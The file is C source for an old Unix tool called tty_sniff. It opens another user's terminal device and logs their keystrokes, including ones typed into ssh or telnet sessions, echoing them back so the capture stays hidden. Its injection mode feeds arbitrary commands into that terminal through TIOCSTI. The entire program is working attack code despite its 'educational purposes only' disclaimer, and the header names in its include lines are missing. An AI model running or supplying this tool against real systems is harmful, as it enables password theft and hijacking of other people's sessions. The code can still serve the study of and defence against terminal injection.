/* * tty_sniff v0.01 10/31/2004 * * This is a very simple tty sniffer/injector. * * The sniffing mode work fine only if the sniffed * tty is running telnet or ssh client. * * -d Device file * -l Output filename * -j Command injection mode * -v Verbose mode * * Tested under Solaris 8/9 and Linux * * $ver=v0.01 $name=tty_sniff $date=10/31/2004 * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY * * (c) 2004 Copyright by Inode * */ #include #include #include #include #include #include #include #define VERSION "0.01" int verbose = 0; int fd; char * outfile = NULL; char * device = NULL; void usage( char * argv0 ); void sniff( void ); void inject( void ); void signal_exit( int i ); int main( int argc, char **argv) { int injection = 0; char opt; fprintf( stderr, "\nTTY Sniffer v%s by Inode \n\n", VERSION); // Check arguments while((opt = getopt(argc, argv, "d:l:jv")) != -1) { switch (opt) { case 'd': device = optarg; break; case 'l': outfile = optarg; break; case 'j': injection = 1; break; case 'v': verbose = 1; break; default: usage( argv[0] ); break; } } if( device == NULL ) usage( argv[0] ); signal(SIGINT, signal_exit); // Open our TTY if( ( fd = open(device, O_RDWR) ) == -1) { fprintf(stderr, " Can't open device %s\n\n", device); exit( 0 ); } if( injection == 0 ) sniff(); else inject(); fprintf(stderr, "\n----------------------------------\n"); fprintf(stderr, "Disconnected from device: %s\n\n", device); close( fd ); return 1; } void inject( void ) { int data; char c; char buf[2]; fprintf(stderr, "Injecting on device %s...\n", device); fprintf(stderr, "----------------------------------\n"); for(;;) { data = read(STDIN_FILENO, &c, 1); sprintf(buf, "%c", c); if( ioctl(fd, TIOCSTI, buf) < 0) break; } } void sniff( void ) { int data; char c; char buf[2]; struct termios term; FILE * out; if( outfile != NULL ) { if(( out = fopen(outfile,"a+") ) == NULL){ fprintf( stderr, "\n Error opening output file\n"); exit(0); } } else out = stdout; fprintf(stderr, "Sniffing device %s...\n", device); fprintf(stderr, "----------------------------------\n"); tcgetattr(fd, &term); term.c_lflag &= ~(ECHO | ICANON); term.c_cc[VMIN] = 1; term.c_cc[VTIME] = 0; tcsetattr(fd, TCSAFLUSH, &term); for(;;) { data = read(fd, &c,1); if( data < 1 ) break; if( verbose > 0 ) fprintf( stderr, "\nHex val: %X Char: \"%c\"\n",c,c); switch (c) { case 0xd: fprintf( out, "\n"); break; case 0x7f: fprintf( out, "^B"); break; default: fprintf( out, "%c",c); break; } fflush(out); sprintf(buf, "%c", c); ioctl(fd, TIOCSTI, buf); usleep(1000); } fclose( out ); } void usage( char * argv0 ) { fprintf( stderr, " Usage: %s -d [-l ] [-j] [-v]\n\n", argv0); exit(0); } void signal_exit( int i ) { fprintf(stderr, "\n----------------------------------\n"); fprintf(stderr, "Disconnected from device: %s\n\n", device); close( fd ); exit(0); }